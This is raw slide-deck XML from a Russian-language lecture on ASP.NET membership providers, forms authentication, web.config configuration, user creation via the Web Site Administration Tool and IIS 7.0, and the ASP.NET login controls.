              <a:t>	&lt;add name="MyMembershipConnString"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1400" smtClean="0"/>
              <a:t>		connectionString="data 	source=(local)\SQLEXPRESS;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1400" smtClean="0"/>
              <a:t>		Integrated Security=SSPI;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1400" smtClean="0"/>
              <a:t>		initial catalog=MyDatabase" /&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1400" smtClean="0"/>
              <a:t>&lt;/connectionStrings&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1400" smtClean="0"/>
              <a:t>Описание провайдера</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1400" smtClean="0"/>
              <a:t>&lt;system.web&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1400" smtClean="0"/>
              <a:t>   &lt;authentication mode="Forms" /&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1400" b="1" smtClean="0"/>
              <a:t>       &lt;membership defaultProvider="MyMembershipProvider"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1400" smtClean="0"/>
              <a:t>       &lt;providers&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1400" smtClean="0"/>
              <a:t>            &lt;add name="MyMembershipProvider"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1400" smtClean="0"/>
              <a:t>                  connectionStringName="MyMembershipConnString"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1400" smtClean="0"/>
              <a:t>                  applicationName="MyMembership"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1400" smtClean="0"/>
              <a:t>                  enablePasswordRetrieval="false"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1400" smtClean="0"/>
              <a:t>                  enablePasswordReset="true"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1400" smtClean="0"/>
              <a:t>                  requiresQuestionAndAnswer="true"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1400" smtClean="0"/>
              <a:t>                  requiresUniqueEmail="true"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1400" smtClean="0"/>
              <a:t>                  passwordFormat="Hashed"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1400" smtClean="0"/>
              <a:t>                  type="System.Web.Security.SqlMembershipProvider" /&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1400" smtClean="0"/>
              <a:t>      &lt;/providers&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1400" b="1" smtClean="0"/>
              <a:t>   &lt;/membership&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1400" smtClean="0"/>
              <a:t>&lt;/system.web&gt;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ru-RU" sz="3600" smtClean="0"/>
              <a:t>Создание и аутентификация пользователей</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="119811" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1600200"/>
            <a:ext cx="8229600" cy="4924425"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>Для создания нового пользователя в созданном хранилище провайдера membership </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>запустить WAT выбрав</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>команду Website -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t>&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t> ASP.NET в Visual Studio </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>перейти к панели Безопасность (Security)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>выбрать пункт Create User.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>После создания пары пользователей можно проверить таблицы aspnet_Users и aspnet_Membership после соединенияс базой данных с помощью:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>Visual Studio Server Explorer (который потребует добавления нового соединения с membership базой данных в Server Explorer) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>SQL Server Management Studio</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>В таблице aspnet_Membership значения пароля (password)  и ответа для восстановления пароля (password question) хранятся в шифрованном виде если выбрана опция passwordFormat="Hashed" для провайдера в разделе &lt;membership&gt; секции конфигурирования файла </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>web.config</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" smtClean="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ru-RU" sz="4000" smtClean="0"/>
              <a:t>Конфигурирование учетных записей в IIS 7.0</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="120835" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1600200"/>
            <a:ext cx="8229600" cy="533400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" b="1" smtClean="0"/>
              <a:t>Конфигурирование Провайдерами и Пользователями</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="120836" name="Picture 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="827088" y="2173288"/>
            <a:ext cx="7586662" cy="4684712"/>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ru-RU" sz="3200" smtClean="0"/>
              <a:t>Управление пользователями непосредственно из IIS 7.0</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="121859" name="Picture 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="684213" y="1916113"/>
            <a:ext cx="7524750" cy="464820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274638"/>
            <a:ext cx="8229600" cy="850900"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="ru-RU" sz="3600" smtClean="0"/>
              <a:t>Создание пользователей с помощью программы WAT</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="122883" name="Picture 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1403350" y="1525588"/>
            <a:ext cx="6337300" cy="5332412"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr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Membership controls</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13315" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="1417638"/>
            <a:ext cx="8410575" cy="5378450"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="70000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" smtClean="0"/>
              <a:t>Several new controls available that tap into the membership and role providers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="70000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>&lt;asp:Login ... /&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="70000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>login authentication form</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="70000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>&lt;asp:LoginView ... /&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="70000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>alternate views based on identity</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="70000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>&lt;asp:PasswordRecovery ... /&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="70000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>password retrieval form (only with un-hashed passwords)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="70000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>&lt;asp:LoginStatus ... /&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="70000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>Status and hyperlink to login/logout based on the state</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="70000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>&lt;asp:LoginName ... /&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="70000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>displays username for authenticated users</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="70000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>&lt;asp:CreateUserWizard ... /&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="70000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>form for entering new users</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="70000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>&lt;asp:ChangePassword ... /&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="70000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>form for changing password</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13316" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7721600" y="5816600"/>
            <a:ext cx="9144000" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700" algn="ctr">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="ru-RU"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13317" name="Picture 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6802438" y="4810125"/>
            <a:ext cx="1812925" cy="2047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ru-RU" sz="4000" smtClean="0"/>
              <a:t>Запуск администрирования веб-узлом</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="123907" name="Picture 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:srcRect l="15427" t="7735" r="11328" b="28149"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2286000" y="1828800"/>
            <a:ext cx="6858000" cy="4503738"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="123908" name="Picture 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4" cstate="print"/>
          <a:srcRect l="9703" t="85" r="67253" b="53905"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="381000" y="1676400"/>
            <a:ext cx="1631950" cy="2438400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="123909" name="Oval 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="381000" y="3733800"/>
            <a:ext cx="1600200" cy="381000"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="0000FF"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="ru-RU"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="123910" name="AutoShape 6"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000">
            <a:off x="1371600" y="3886200"/>
            <a:ext cx="609600" cy="1219200"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 352152810 w 21600"/>
              <a:gd name="T1" fmla="*/ 0 h 21600"/>
              <a:gd name="T2" fmla="*/ 218741052 w 21600"/>
              <a:gd name="T3" fmla="*/ 1221948177 h 21600"/>
              <a:gd name="T4" fmla="*/ 0 w 21600"/>
              <a:gd name="T5" fmla="*/ 2147483647 h 21600"/>
              <a:gd name="T6" fmla="*/ 201680160 w 21600"/>
              <a:gd name="T7" fmla="*/ 2147483647 h 21600"/>
              <a:gd name="T8" fmla="*/ 403337066 w 21600"/>
              <a:gd name="T9" fmla="*/ 2147483647 h 21600"/>
              <a:gd name="T10" fmla="*/ 485542386 w 21600"/>
              <a:gd name="T11" fmla="*/ 1221948177 h 21600"/>
              <a:gd name="T12" fmla="*/ 17694720 60000 65536"/>
              <a:gd name="T13" fmla="*/ 11796480 60000 65536"/>
              <a:gd name="T14" fmla="*/ 11796480 60000 65536"/>
              <a:gd name="T15" fmla="*/ 5898240 60000 65536"/>
              <a:gd name="T16" fmla="*/ 0 60000 65536"/>
              <a:gd name="T17" fmla="*/ 0 60000 65536"/>
              <a:gd name="T18" fmla="*/ 0 w 21600"/>
              <a:gd name="T19" fmla="*/ 16117 h 21600"/>
              <a:gd name="T20" fmla="*/ 1794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66" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9731" y="6795"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13388" y="6795"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13388" y="16117"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="16117"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="21600"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17943" y="21600"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17943" y="6795"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21600" y="6795"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="ru-RU"/>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endParaRPr lang="ru-RU" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="124931" name="Picture 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:srcRect t="15193" r="992" b="4701"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="468313" y="1484313"/>
            <a:ext cx="8424862" cy="5113337"/>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ru-RU" sz="3600" smtClean="0"/>
              <a:t>Выбор типа проверки подлинности</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="125955" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1600200"/>
            <a:ext cx="8229600" cy="533400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="ru-RU" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="125956" name="Picture 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:srcRect l="19273" t="28249" r="57706" b="35834"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
